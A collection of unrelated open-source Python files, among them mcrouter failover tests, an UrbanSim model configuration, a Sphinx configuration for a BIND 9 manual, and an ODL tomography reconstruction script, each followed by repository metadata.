self.assertEqual(mcnull_val, None)
self.assertEqual(mcwild_val, "should_be_set_wild")
self.assertEqual(mcr.delete("null:key2"), None)
self.assertEqual(int(mcr.stats('ods')['dev_null_requests']), 2)
class TestMigratedPools(McrouterTestCase):
config = './mcrouter/test/test_migrated_pools.json'
extra_args = []
def setUp(self):
self.wild_new = self.add_server(Memcached())
self.wild_old = self.add_server(Memcached())
def get_mcrouter(self):
return self.add_mcrouter(
self.config, extra_args=self.extra_args,
replace_map={"START_TIME": (int(time.time()) + 2)})
def test_migrated_pools(self):
mcr = self.get_mcrouter()
#set keys that should be deleted in later phases
for phase in range(1, 5):
self.wild_old.set("get-key-" + str(phase), str(phase))
self.wild_new.set("get-key-" + str(phase), str(phase * 100))
# first we are in the old domain make sure all ops go to
# the old host only
self.assertEqual(mcr.get("get-key-1"), str(1))
mcr.set("set-key-1", str(42))
self.assertEqual(self.wild_old.get("set-key-1"), str(42))
self.assertEqual(self.wild_new.get("set-key-1"), None)
mcr.delete("get-key-1")
#make sure the delete went to old but not new
self.assertEqual(self.wild_old.get("get-key-1"), None)
self.assertEqual(self.wild_new.get("get-key-1"), str(100))
#next phase
time.sleep(2)
# gets/sets go to the old place
self.assertEqual(mcr.get("get-key-2"), str(2))
mcr.set("set-key-2", str(4242))
self.assertEqual(self.wild_old.get("set-key-2"), str(4242))
self.assertEqual(self.wild_new.get("set-key-2"), None)
mcr.delete("get-key-2")
#make sure the delete went to both places
self.assertEqual(self.wild_old.get("get-key-2"), None)
self.assertEqual(self.wild_new.get("get-key-2"), None)
#next phase
time.sleep(2)
# gets/sets go to the new place
self.assertEqual(mcr.get("get-key-3"), str(300))
mcr.set("set-key-3", str(424242))
self.assertEqual(self.wild_old.get("set-key-3"), None)
self.assertEqual(self.wild_new.get("set-key-3"), str(424242))
mcr.delete("get-key-3")
#make sure the delete went to both places
self.assertEqual(self.wild_old.get("get-key-3"), None)
self.assertEqual(self.wild_new.get("get-key-3"), None)
#next phase
time.sleep(2)
# gets/sets go to the new place
self.assertEqual(mcr.get("get-key-4"), str(400))
mcr.set("set-key-4", str(42424242))
self.assertEqual(self.wild_old.get("set-key-4"), None)
self.assertEqual(self.wild_new.get("set-key-4"), str(42424242))
mcr.delete("get-key-4")
#make sure the delete went to the new place only
self.assertEqual(self.wild_old.get("get-key-4"), str(4))
self.assertEqual(self.wild_new.get("get-key-4"), None)
class TestMigratedPoolsFailover(McrouterTestCase):
config = './mcrouter/test/test_migrated_pools_failover.json'
extra_args = []
def setUp(self):
self.a_new = self.add_server(Memcached())
self.a_old = self.add_server(Memcached())
self.b_new = self.add_server(Memcached())
self.b_old = self.add_server(Memcached())
def get_mcrouter(self):
return self.add_mcrouter(
self.config, extra_args=self.extra_args,
replace_map={"START_TIME": (int(time.time()) + 2)})
def test_migrated_pools_failover(self):
mcr = self.get_mcrouter()
#set keys that should be deleted in later phases
for phase in range(1, 5):
self.a_old.set("get-key-" + str(phase), str(phase))
self.a_new.set("get-key-" + str(phase), str(phase * 10))
self.b_old.set("get-key-" + str(phase), str(phase * 100))
self.b_new.set("get-key-" + str(phase), str(phase * 1000))
# first we are in the old domain make sure all ops go to
# the old host only
self.assertEqual(mcr.get("get-key-1"), str(1))
mcr.set("set-key-1", str(42))
self.assertEqual(self.a_old.get("set-key-1"), str(42))
self.a_old.terminate()
self.assertEqual(mcr.get("get-key-1"), str(100))
mcr.set("set-key-1", str(42))
self.assertEqual(self.b_old.get("set-key-1"), str(42))
#next phase
time.sleep(2.5)
self.assertEqual(mcr.get("get-key-2"), str(200))
mcr.set("set-key-2", str(42))
self.assertEqual(self.b_old.get("set-key-2"), str(42))
#next phase
time.sleep(2.5)
# gets/sets go to the new place
self.assertEqual(mcr.get("get-key-3"), str(30))
mcr.set("set-key-3", str(424242))
self.assertEqual(self.a_new.get("set-key-3"), str(424242))
self.a_new.terminate()
self.assertEqual(mcr.get("get-key-3"), str(3000))
class TestDuplicateServers(McrouterTestCase):
config = './mcrouter/test/test_duplicate_servers.json'
extra_args = []
def setUp(self):
self.wildcard = self.add_server(Memcached(), 12345)
def get_mcrouter(self):
return self.add_mcrouter(
self.config, '/a/a/', extra_args=self.extra_args)
def test_duplicate_servers(self):
mcr = self.get_mcrouter()
stats = mcr.stats('servers')
# Check that only one proxy destination connection is made
# for all the duplicate servers
self.assertEqual(1, len(stats))
# Hardcoding default server timeout
key = 'localhost:' + str(self.port_map[12345]) + ':TCP:ascii-1000'
self.assertTrue(key in stats)
class TestDuplicateServersDiffTimeouts(McrouterTestCase):
config = './mcrouter/test/test_duplicate_servers_difftimeouts.json'
extra_args = []
def setUp(self):
self.wildcard = self.add_server(Memcached(), 12345)
def get_mcrouter(self):
return self.add_mcrouter(
self.config, '/a/a/', extra_args=self.extra_args)
def test_duplicate_servers_difftimeouts(self):
mcr = self.get_mcrouter()
stats = mcr.stats('servers')
# Check that only two proxy destination connections are made
# for all the duplicate servers in pools with diff timeout
self.assertEqual(2, len(stats))
# Hardcoding default server timeout
key = 'localhost:' + str(self.port_map[12345]) + ':TCP:ascii-1000'
self.assertTrue(key in stats)
key = 'localhost:' + str(self.port_map[12345]) + ':TCP:ascii-2000'
self.assertTrue(key in stats)
class TestSamePoolFailover(McrouterTestCase):
config = './mcrouter/test/test_same_pool_failover.json'
extra_args = []
def setUp(self):
self.add_server(Memcached(), 12345)
def get_mcrouter(self):
return self.add_mcrouter(self.config, extra_args=self.extra_args)
def test_same_pool_failover(self):
mcr = self.get_mcrouter()
self.assertEqual(mcr.get('foobar'), None)
self.assertTrue(mcr.set('foobar', 'bizbang'))
self.assertEqual(mcr.get('foobar'), 'bizbang')
mcr.delete('foobar')
self.assertEqual(mcr.get('foobar'), None)
class TestGetFailover(McrouterTestCase):
config = './mcrouter/test/test_get_failover.json'
extra_args = []
def setUp(self):
self.gut = self.add_server(Memcached())
self.wildcard = self.add_server(Memcached())
def get_mcrouter(self):
return self.add_mcrouter(self.config, extra_args=self.extra_args)
def failover_common(self, key):
self.mcr = self.get_mcrouter()
self.assertEqual(self.mcr.get(key), None)
self.assertTrue(self.mcr.set(key, 'bizbang'))
self.assertEqual(self.mcr.get(key), 'bizbang')
        # kill the main host so everything fails over to gut
self.wildcard.terminate()
self.assertEqual(self.mcr.get(key), None)
self.assertTrue(self.mcr.set(key, 'bizbang-fail'))
self.assertEqual(self.mcr.get(key), 'bizbang-fail')
def test_get_failover(self):
self.failover_common('testkey')
# the failover should have set it with a much shorter TTL
# so make sure that we can't get the value after the TTL
# has expired
time.sleep(4)
self.assertEqual(self.mcr.get('testkey'), None)
class TestGetFailoverWithFailoverTag(TestGetFailover):
config = './mcrouter/test/test_get_failover_with_failover_tag.json'
def test_get_failover(self):
key = 'testkey|#|extra=1'
self.failover_common(key)
# Verify the failover tag was appended
fail_key = key + ":failover=localhost@" + str(self.gut.getport())
self.assertEqual(self.mcr.get(key), 'bizbang-fail')
self.assertEqual(self.gut.get(fail_key), 'bizbang-fail')
class TestLeaseGetFailover(McrouterTestCase):
config = './mcrouter/test/test_get_failover.json'
extra_args = []
def setUp(self):
self.gut = self.add_server(Memcached())
self.wildcard = self.add_server(Memcached())
def get_mcrouter(self):
return self.add_mcrouter(self.config, extra_args=self.extra_args)
def test_lease_get_failover(self):
mcr = self.get_mcrouter()
get_res = {}
get_res['testkey'] = mcr.leaseGet('testkey')
get_res['testkey']['value'] = 'bizbang-lease'
self.assertGreater(get_res['testkey']['token'], 0)
self.assertTrue(mcr.leaseSet('testkey', get_res['testkey']))
get_res['testkey'] = mcr.leaseGet('testkey')
self.assertFalse(get_res['testkey']['token'])
self.assertEqual(get_res['testkey']['value'], 'bizbang-lease')
        # kill the main host so everything fails over to mctestc00.gut
self.wildcard.terminate()
get_res['testkey'] = mcr.leaseGet('testkey')
get_res['testkey']['value'] = 'bizbang-lease-fail'
self.assertGreater(get_res['testkey']['token'], 0)
self.assertTrue(mcr.leaseSet('testkey', get_res['testkey']))
get_res['testkey'] = mcr.leaseGet('testkey')
self.assertFalse(get_res['testkey']['token'])
self.assertEqual(get_res['testkey']['value'], 'bizbang-lease-fail')
# the failover should have set it with a much shorter TTL
# so make sure that we can't get the value after the TTL
# has expired
time.sleep(4)
get_res['testkey'] = mcr.leaseGet('testkey')
self.assertGreater(get_res['testkey']['token'], 0)
self.assertFalse(get_res['testkey']['value'])
class TestMetaGetFailover(McrouterTestCase):
config = './mcrouter/test/test_get_failover.json'
extra_args = []
def setUp(self):
self.gut = self.add_server(Memcached())
self.wildcard = self.add_server(Memcached())
def get_mcrouter(self):
return self.add_mcrouter(self.config, extra_args=self.extra_args)
def test_metaget_failover(self):
mcr = self.get_mcrouter()
get_res = {}
self.assertTrue(mcr.set('testkey', 'bizbang'))
get_res = mcr.metaget('testkey')
self.assertEqual(0, int(get_res['exptime']))
self.wildcard.terminate()
self.assertTrue(mcr.set('testkey', 'bizbang-fail'))
self.assertEqual(mcr.get('testkey'), 'bizbang-fail')
get_res = mcr.metaget('testkey')
self.assertAlmostEqual(int(get_res['exptime']),
int(time.time()) + 3,
delta=1)
# the failover should have set it with a much shorter TTL
# so make sure that we can't get the value after the TTL
# has expired
time.sleep(4)
self.assertEqual(mcr.metaget('testkey'), {})
self.assertEqual(mcr.get('testkey'), None)
|
tempbottle/mcrouter
|
mcrouter/test/test_mcrouter.py
|
Python
|
bsd-3-clause
| 13,301
| 0.001579
|
# Opus/UrbanSim urban simulation software.
# Copyright (C) 2005-2009 University of Washington
# See opus_core/LICENSE
from urbansim.configs.base_configuration import AbstractUrbansimConfiguration
from opus_core.resources import merge_resources_if_not_None
import copy
"""this configuration file specifying workplace choice models:
home_based_workplace_choice_model, workplace_choice_model_for_residents,
workplace_choice_model_for_immigrants, and
simple models keeping consistency between persons and households/jobs.
Home base choice model is defined in urbansim.configs.general_configuration_with_changed_elcm
"""
config = AbstractUrbansimConfiguration()
run_configuration = config.copy()
wlcm_model_configuration = {
"estimation":"opus_core.bhhh_mnl_estimation",
"sampler":"opus_core.samplers.weighted_sampler",
"sample_size_locations":30,
"weights_for_estimation_string":"urbansim.zone.number_of_non_home_based_jobs",
"compute_capacity_flag":True,
"capacity_string":"urbansim.zone.number_of_non_home_based_jobs",
"number_of_units_string":"urbansim.zone.number_of_non_home_based_jobs",
}
run_configuration['models_configuration']['workplace_choice_model_for_resident']= wlcm_model_configuration
my_controller_configuration = {
'household_person_consistency_keeper':{
"import": {"psrc.models.persons_consistency_keeper_model":"PersonDatasetConsistencyKeeperModel"},
"init": {
"name": "PersonDatasetConsistencyKeeperModel",
"arguments": {},
},
"run": {
"arguments": {"household_set": "household",
"person_set":"person",
"expand_person_set":True,
}
},
},
# This isn't necessary since we don't explicitly match person to job, but number of jobs and persons should match at zone level
# 'job_person_consistency_keeper':{
# "import": {"psrc.models.persons_consistency_keeper_model":"PersonDatasetConsistencyKeeperModel"},
# "init": {
# "name": "PersonDatasetConsistencyKeeperModel",
# "arguments": {},
# },
# "run": {
# "arguments": {"job_set": "job",
# "person_set":"person",
# "expand_person_set":False,
# }
# },
# },
'workplace_choice_model_for_resident': {
"import": {"urbansim.models.agent_location_choice_model":"AgentLocationChoiceModel"},
"init": {
"name": "AgentLocationChoiceModel",
"arguments": {
"location_set":"zone",
"model_name":"'Non-home-based Workplace Choice Model for residents'",
"short_name":"'NHBWCM'",
"choices":"'urbansim.lottery_choices'",
"submodel_string":"'psrc.person.household_income'",
# "filter": "'psrc.job.is_untaken_non_home_based_job'",
"location_id_string":"'psrc.person.zone_id'",#"'psrc.person.workplace_zone_id'",
"run_config":"models_configuration['workplace_choice_model_for_resident']",
"estimate_config":"models_configuration['workplace_choice_model_for_resident']"
}},
"prepare_for_run": {
"name": "prepare_for_run",
"arguments": {"specification_storage": "base_cache_storage", #"models_configuration['specification_storage']",
"specification_table": "'workplace_choice_model_for_resident_specification'",
"coefficients_storage": "base_cache_storage", #"models_configuration['coefficients_storage']",
"coefficients_table": "'workplace_choice_model_for_resident_coefficients'",
},
"output": "(specification, coefficients)"
},
"run": {
"arguments": {"specification": "specification",
"coefficients":"coefficients",
"agent_set": "person",
"agents_index": None,
"agents_filter":"'psrc.person.is_non_home_based_worker_without_workplace_zone'",
"data_objects": "datasets",
"chunk_specification":"{'records_per_chunk':5000}",
"debuglevel": run_configuration['debuglevel'] }
},
"prepare_for_estimate": {
"name": "prepare_for_estimate",
"arguments": {
"agent_set":"person",
"join_datasets": "False",
"agents_for_estimation_storage": "base_cache_storage",
"agents_for_estimation_table": "'workers_for_estimation'",
"filter":None,
"data_objects": "datasets"
},
"output": "(specification, index)"
},
"estimate": {
"arguments": {
"specification": "specification",
"agent_set": "person",
"agents_index": "index",
"data_objects": "datasets",
"debuglevel": run_configuration['debuglevel']},
"output": "(coefficients, dummy)"
},
},
"job_change_model":{
"import": {"urbansim.models.agent_relocation_model":
"AgentRelocationModel"
},
"init": {
"name": "AgentRelocationModel",
"arguments": {"choices":"opus_core.random_choices",
"probabilities":"psrc.job_change_probabilities",
"location_id_name":"'psrc.person.workplace_zone_id'",
"model_name":"job change model",
"debuglevel": config['debuglevel']
},
},
"prepare_for_run": {
"name": "prepare_for_run",
"arguments": {"what": "'person'", "rate_storage": "base_cache_storage",
"rate_table": "'annual_job_change_rates_for_workers'"},
"output": "jcm_resources"
},
"run": {
"arguments": {"agent_set": "person", "resources": "jcm_resources"},
"output": "jcm_index"
}
}
}
my_controller_configuration["workplace_choice_model_for_immigrant"] = copy.deepcopy(my_controller_configuration["workplace_choice_model_for_resident"])
my_controller_configuration["workplace_choice_model_for_immigrant"]["init"]["arguments"]["model_name"] = "'Non-home-based Workplace Choice Model for immigrants'"
my_controller_configuration["workplace_choice_model_for_immigrant"]["prepare_for_run"]["arguments"]["specification_table"] = "'workplace_choice_model_for_immigrant_specification'"
my_controller_configuration["workplace_choice_model_for_immigrant"]["prepare_for_run"]["arguments"]["coefficients_table"] = "'workplace_choice_model_for_immigrant_coefficients'"
my_controller_configuration["workplace_choice_model_for_immigrant"]["run"]["arguments"]["agents_filter"] = "'psrc.person.is_immigrant_worker_without_workplace_zone'"
my_controller_configuration["home_based_workplace_choice_model"] = copy.deepcopy(my_controller_configuration["workplace_choice_model_for_resident"])
my_controller_configuration["home_based_workplace_choice_model"]["init"]["arguments"]["filter"] = "'psrc.job.is_untaken_home_based_job'"
my_controller_configuration["home_based_workplace_choice_model"]["init"]["arguments"]["model_name"] = "'Home-based Work Choice Model'"
my_controller_configuration["home_based_workplace_choice_model"]["init"]["arguments"]["short_name"] = "'HBWCM'"
my_controller_configuration["home_based_workplace_choice_model"]["prepare_for_run"]["arguments"]["specification_table"] = "'home_based_workplace_choice_model_specification'"
my_controller_configuration["home_based_workplace_choice_model"]["prepare_for_run"]["arguments"]["coefficients_table"] = "'home_based_workplace_choice_model_coefficients'"
my_controller_configuration["home_based_workplace_choice_model"]["run"]["arguments"]["agents_filter"] = "'psrc.person.is_home_based_worker_without_job'"
my_controller_configuration["home_based_workplace_choice_model"]["run"]["arguments"]["chunk_specification"] = "{'nchunks':1}"
my_controller_configuration["worker_specific_household_location_choice_model"] = copy.deepcopy(run_configuration['models_configuration']["household_location_choice_model"]["controller"])
my_controller_configuration["worker_specific_household_location_choice_model"]["init"]["arguments"]["submodel_string"] = "'psrc.household.nonhome_based_workers_category'"
#my_controller_configuration["worker_specific_household_location_choice_model"]["init"]["arguments"]["model_name"] = "'Home-based Work Choice Model'"
#my_controller_configuration["worker_specific_household_location_choice_model"]["init"]["arguments"]["short_name"] = "'HBWCM'"
my_controller_configuration["worker_specific_household_location_choice_model"]["prepare_for_run"]["arguments"]["specification_table"] = "'worker_specific_household_choice_model_specification'"
my_controller_configuration["worker_specific_household_location_choice_model"]["prepare_for_run"]["arguments"]["coefficients_table"] = "'worker_specific_household_choice_model_coefficients'"
for model in my_controller_configuration.keys():
if model not in run_configuration["models_configuration"].keys():
run_configuration["models_configuration"][model] = {}
run_configuration["models_configuration"][model]['controller'] = my_controller_configuration[model]
run_configuration['creating_baseyear_cache_configuration'].tables_to_cache += [
"persons",
"workers_for_estimation",
"home_based_choice_model_coefficients",
"home_based_choice_model_specification",
"home_based_workplace_choice_model_coefficients",
"home_based_workplace_choice_model_specification",
"workplace_choice_model_for_resident_specification",
"workplace_choice_model_for_resident_coefficients",
"workplace_choice_model_for_immigrant_specification",
"workplace_choice_model_for_immigrant_coefficients",
]
run_configuration["datasets_to_preload"]['person'] = {'package_name':'psrc'}
run_configuration["models"] = [
# "prescheduled_events",
# "events_coordinator",
# "residential_land_share_model",
# 'land_price_model',
# 'development_project_transition_model',
# 'residential_development_project_location_choice_model',
# 'commercial_development_project_location_choice_model',
# 'industrial_development_project_location_choice_model',
# "development_event_transition_model",
# "events_coordinator",
# "residential_land_share_model",
# "household_transition_model",
# "employment_transition_model",
# "household_relocation_model",
# "household_location_choice_model",
# "employment_relocation_model",
# {"employment_location_choice_model": {"group_members": "_all_"}},
# "distribute_unplaced_jobs_model"
"prescheduled_events",
"events_coordinator",
"residential_land_share_model",
'land_price_model',
'development_project_transition_model',
'residential_development_project_location_choice_model',
'commercial_development_project_location_choice_model',
'industrial_development_project_location_choice_model',
"development_event_transition_model",
"events_coordinator",
"residential_land_share_model",
"household_transition_model",
"employment_transition_model",
"household_person_consistency_keeper",
"home_based_choice_model",
"home_based_workplace_choice_model",
"job_change_model",
"workplace_choice_model_for_immigrant",
"job_person_consistency_keeper",
"household_relocation_model",
"household_location_choice_model",
"workplace_choice_model_for_resident",
"employment_relocation_model",
{"employment_location_choice_model": {"group_members": "_all_"}},
"distribute_unplaced_jobs_model"
]
|
christianurich/VIBe2UrbanSim
|
3rdparty/opus/src/psrc/config/workplace_zone_choice_model_config.py
|
Python
|
gpl-2.0
| 13,587
| 0.011261
|
############################################################################
# Copyright (C) Internet Systems Consortium, Inc. ("ISC")
#
# This Source Code Form is subject to the terms of the Mozilla Public
# License, v. 2.0. If a copy of the MPL was not distributed with this
# file, you can obtain one at https://mozilla.org/MPL/2.0/.
#
# See the COPYRIGHT file distributed with this work for additional
# information regarding copyright ownership.
############################################################################
# flake8: noqa: E501
from typing import List, Tuple
from docutils import nodes
from docutils.nodes import Node, system_message
from docutils.parsers.rst import roles
from sphinx import addnodes
from sphinx.util.docutils import ReferenceRole
GITLAB_BASE_URL = 'https://gitlab.isc.org/isc-projects/bind9/-/'
# Custom Sphinx role enabling automatic hyperlinking to GitLab issues/MRs.
class GitLabRefRole(ReferenceRole):
def __init__(self, base_url: str) -> None:
self.base_url = base_url
super().__init__()
def run(self) -> Tuple[List[Node], List[system_message]]:
gl_identifier = '[GL %s]' % self.target
target_id = 'index-%s' % self.env.new_serialno('index')
entries = [('single', 'GitLab; ' + gl_identifier, target_id, '', None)]
index = addnodes.index(entries=entries)
target = nodes.target('', '', ids=[target_id])
self.inliner.document.note_explicit_target(target)
try:
refuri = self.build_uri()
reference = nodes.reference('', '', internal=False, refuri=refuri,
classes=['gl'])
if self.has_explicit_title:
reference += nodes.strong(self.title, self.title)
else:
reference += nodes.strong(gl_identifier, gl_identifier)
except ValueError:
error_text = 'invalid GitLab identifier %s' % self.target
msg = self.inliner.reporter.error(error_text, line=self.lineno)
prb = self.inliner.problematic(self.rawtext, self.rawtext, msg)
return [prb], [msg]
return [index, target, reference], []
def build_uri(self):
if self.target[0] == '#':
return self.base_url + 'issues/%d' % int(self.target[1:])
if self.target[0] == '!':
return self.base_url + 'merge_requests/%d' % int(self.target[1:])
raise ValueError
def setup(_):
roles.register_local_role('gl', GitLabRefRole(GITLAB_BASE_URL))
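# Usage sketch (not part of the original file): Sphinx invokes the module-level
# ``setup()`` above when this conf.py is loaded, which registers the ``gl`` role.
# In reStructuredText the role can then be used roughly as follows; the numbers
# are placeholders, not real references:
#
#   Fixed a crash in the resolver. :gl:`#1234`
#   See :gl:`!567` for the merge request that changed this behaviour.
#
# Per ``build_uri()`` above, ``#<n>`` expands to ``<GITLAB_BASE_URL>issues/<n>``
# and ``!<n>`` to ``<GITLAB_BASE_URL>merge_requests/<n>``.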
# Configuration file for the Sphinx documentation builder.
#
# This file only contains a selection of the most common options. For a full
# list see the documentation:
# https://www.sphinx-doc.org/en/master/usage/configuration.html
# -- Path setup --------------------------------------------------------------
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#
# import os
# import sys
# sys.path.insert(0, os.path.abspath('.'))
# -- Project information -----------------------------------------------------
project = 'BIND 9 管理员参考手册'
copyright = u'2021, Internet Systems Consortium'
author = u"Internet Systems Consortium \\and 翻译: sunguonian@yahoo.com"
# The full version, including alpha/beta/rc tags
release = 'BIND 9.16.18(稳定版)'
# -- General configuration ---------------------------------------------------
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = []
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#
# This is also used if you do content translation via gettext catalogs.
# Usually you set "language" from the command line for these cases.
language = 'zh_CN'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
# This pattern also affects html_static_path and html_extra_path.
exclude_patterns = [
'_build',
'Thumbs.db',
'.DS_Store',
'*.grammar.rst',
'*.zoneopts.rst',
'catz.rst',
'dlz.rst',
'dnssec.rst',
'dyndb.rst',
'logging-cattegories.rst',
'managed-keys.rst',
'pkcs11.rst',
'plugins.rst'
]
# The master toctree document.
master_doc = 'index'
# -- Options for HTML output -------------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
#
#html_theme = 'alabaster'
html_theme = 'sphinx_rtd_theme'
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
#html_static_path = ['_static']
latex_engine = 'xelatex'
latex_elements = {
'fontpkg': r'''
\setmainfont{Source Han Serif CN:style=Regular}
\setsansfont{Source Han Sans CN Medium:style=Medium,Regular}
\setmonofont{Source Han Sans CN:style=Regular}
\setCJKfamilyfont{song}{Source Han Serif CN:style=Regular}
\setCJKfamilyfont{heiti}{Source Han Sans CN:style=Regular}
''',
'pointsize': '11pt',
'preamble': r'\input{../mystyle.tex.txt}'
}
latex_documents = [
(master_doc, 'Bv9ARM.tex', u'BIND 9管理员参考手册', author, 'manual'),
]
latex_logo = "isc-logo.pdf"
|
perlang/bv9arm-chinese
|
branches/9.16.18/arm/conf.py
|
Python
|
mpl-2.0
| 5,717
| 0.000352
|
from RGT.XML.SVG.basicSvgNode import BasicSvgNode
from RGT.XML.SVG.Attribs.conditionalProcessingAttributes import ConditionalProcessingAttributes
from RGT.XML.SVG.Attribs.xlinkAttributes import XlinkAttributes
from RGT.XML.SVG.Attribs.animationTimingAttributes import AnimationTimingAttributes
class BaseAnimationNode(BasicSvgNode, ConditionalProcessingAttributes, XlinkAttributes, AnimationTimingAttributes):
ATTRIBUTE_EXTERNAL_RESOURCES_REQUIRED = 'externalResourcesRequired'
def __init__(self, ownerDoc, tagName):
BasicSvgNode.__init__(self, ownerDoc, tagName)
ConditionalProcessingAttributes.__init__(self)
XlinkAttributes.__init__(self)
AnimationTimingAttributes.__init__(self)
self._allowedSvgChildNodes.update(self.SVG_GROUP_DESCRIPTIVE_ELEMENTS)
def setExternalResourcesRequired(self, data):
allowedValues = ['true', 'false']
if data is not None:
if data not in allowedValues:
values = ''
for value in allowedValues:
values += value + ', '
values = values[0: len(values) - 2]
                raise ValueError('Value not allowed, only ' + values + ' are allowed')
else:
self._setNodeAttribute(self.ATTRIBUTE_EXTERNAL_RESOURCES_REQUIRED, data)
def getExternalResourcesRequired(self):
node = self._getNodeAttribute(self.ATTRIBUTE_EXTERNAL_RESOURCES_REQUIRED)
if node is not None:
return node.nodeValue
return None
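# Usage sketch (illustrative only; ``SomeAnimationNode`` and ``ownerDoc`` stand in
# for a concrete subclass and an owning SVG document provided elsewhere in RGT):
#
#   node = SomeAnimationNode(ownerDoc, 'animate')
#   node.setExternalResourcesRequired('true')
#   node.getExternalResourcesRequired()       # -> 'true'
#   node.setExternalResourcesRequired('yes')  # raises ValueError (only 'true'/'false')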
|
danrg/RGT-tool
|
src/RGT/XML/SVG/Animation/baseAnimationNode.py
|
Python
|
mit
| 1,499
| 0.004003
|
# -*- coding: utf-8 -*-
"""
Created on Fri Dec 11 11:34:27 2015
@author: JonasAdler
"""
# Imports for common Python 2/3 codebase
from __future__ import print_function, division, absolute_import
from future import standard_library
standard_library.install_aliases()
# External
import numpy as np
# Internal
import odl
from tomography_helper import ForwardProjector
def SplitBregmanReconstruct(A, Phi, x, rhs, la, mu, iterations=1, N=1):
""" Reconstruct with split Bregman.
Parameters
----------
A : `odl.Operator`
        Projector
Phi : `odl.Operator`
Sparsifying transform
x : ``A.domain`` element
"""
Atf = A.adjoint(rhs)
b = Phi.range.zero()
d = Phi.range.zero()
op = mu * (A.adjoint * A) + la * (Phi.adjoint * Phi)
fig = None
for i in range(iterations):
for n in range(N):
# Solve tomography part iteratively
rhs = mu * Atf + la * Phi.adjoint(d-b)
odl.solvers.conjugate_gradient(op, x, rhs, niter=2)
# d = sign(Phi(x)+b) * max(|Phi(x)+b|-la^-1,0)
s = Phi(x) + b
d = s.ufunc.sign() * (s.ufunc.absolute().
ufunc.add(-1.0/la).
ufunc.maximum(0.0))
b = b + Phi(x) - d
fig = x.show(clim=[0.0, 1.1], fig=fig, show=True)
n = 100
# Create spaces
d = odl.uniform_discr([0, 0], [1, 1], [n, n])
ran = odl.uniform_discr([0, 0], [1, np.pi], [np.ceil(np.sqrt(2) * n), n])
# Create phantom
phantom = odl.util.shepp_logan(d, modified=True)
# These are tuning parameters in the algorithm
la = 500. / n # Relaxation
mu = 20000. / n # Data fidelity
# Create projector
Phi = odl.trafos.WaveletTransform(d, nscales=3, wbasis='db2', mode='per')
A = ForwardProjector(d, ran)
# Create data
rhs = A(phantom)
# Add noise
rhs.ufunc.add(np.random.rand(ran.size)*0.05, out=rhs)
# Reconstruct
x = d.zero()
#odl.solvers.conjugate_gradient_normal(A, x, rhs, niter=7)
SplitBregmanReconstruct(A, Phi, x, rhs, la, mu, 100, 1)
x.show()
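# Reading of the algorithm above (a sketch, matching the code rather than quoting
# a reference): the script approximately solves
#
#   min_x  (mu/2) * ||A x - rhs||_2^2  +  la * ||Phi x||_1
#
# with the split Bregman iteration
#
#   x  <-  approximate solution of (mu A^T A + la Phi^T Phi) x = mu A^T rhs + la Phi^T (d - b)
#          (two conjugate-gradient steps per inner iteration)
#   d  <-  shrink(Phi x + b, 1/la),   where shrink(s, t) = sign(s) * max(|s| - t, 0)
#   b  <-  b + Phi x - d
#
# which is exactly the update sequence inside SplitBregmanReconstruct.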
|
odlgroup/odl-examples
|
tomography_wavelet_split_bregman.py
|
Python
|
gpl-3.0
| 2,070
| 0.002415
|
import re
class CommandError(Exception):
pass
class BaseCommand():
"""
    Base command; accepts and handles some generic features shared by all commands,
    such as error handling and argument retrieval / checking.
"""
def __init__(self, args):
"""
Initialize the class
"""
self._args = args
def arg(self, key):
"""
Retrieve a single argument
"""
return self._args.get(key)
def args(self, *keys):
"""
        Retrieve a set of arguments
"""
if keys:
return [self.arg(k) for k in keys]
else:
return self._args
def value(self, key):
"""
        Retrieve a positional value, i.e. the argument stored under '<key>'
"""
key = '<{0}>'.format(key)
return self.arg(key)
def option(self, key, value=None):
"""
        Retrieve an option ('--key'); if a value is given, return whether the option equals it
"""
key = '--'+key
if value:
return self.arg(key) == value
return self.arg(key)
def args_context(self):
"""
Convert all options and values into a context usable by the template parser
"""
context = dict(options={}, values={})
for key, value in self.args().items():
expressions = {
'options': r'--(.*)',
'values': r'<(.*)>',
}
for group, expression in expressions.items():
matches = re.search(expression, key)
if matches:
context[matches.group(1).replace('-', '_')] = value
return context
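# Usage sketch (the arguments dict below mimics docopt-style parsing; the keys
# are illustrative and not defined by this module):
#
#   args = {'<name>': 'blog', '--verbose': True, '--env': 'dev'}
#   cmd = BaseCommand(args)
#   cmd.value('name')         # -> 'blog'
#   cmd.option('verbose')     # -> True
#   cmd.option('env', 'dev')  # -> True (compares the option against the given value)
#   cmd.args_context()        # -> {'options': {}, 'values': {}, 'name': 'blog',
#                             #     'verbose': True, 'env': 'dev'}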
|
snelis/snelis
|
snelis/management/commands/__init__.py
|
Python
|
bsd-3-clause
| 1,601
| 0.001874
|
"""
Configuration for a project.
"""
rails = {
'models.engine': 'sqlalchemy',
'models.db.type': 'postgres',
'models.db.user': 'rails',
'models.db.password': 'rails',
'views.engine': 'jinja',
}
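# Usage sketch (how the consuming framework reads this is not shown in this file;
# plain dictionary access is assumed):
#
#   from config import rails
#   rails['models.engine']   # -> 'sqlalchemy'
#   rails['models.db.type']  # -> 'postgres'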
|
PythonRails/examples
|
blog/config.py
|
Python
|
mit
| 218
| 0
|
import sys
from contextlib import contextmanager
from StringIO import StringIO
@contextmanager
def string_stdout():
    """Temporarily redirect sys.stdout into a StringIO buffer."""
    output = StringIO()
    sys.stdout = output
    try:
        yield output
    finally:
        # Restore the real stdout even if the body of the with-block raised.
        sys.stdout = sys.__stdout__
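# Usage sketch:
#
#   with string_stdout() as out:
#       print('captured')
#   assert out.getvalue() == 'captured\n'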
|
jklaiho/django-class-fixtures
|
class_fixtures/utils/__init__.py
|
Python
|
bsd-3-clause
| 214
| 0.004673
|
##########################################################################
#This file is part of WTFramework.
#
# WTFramework is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# WTFramework is distributed in the hope that it will be useful,
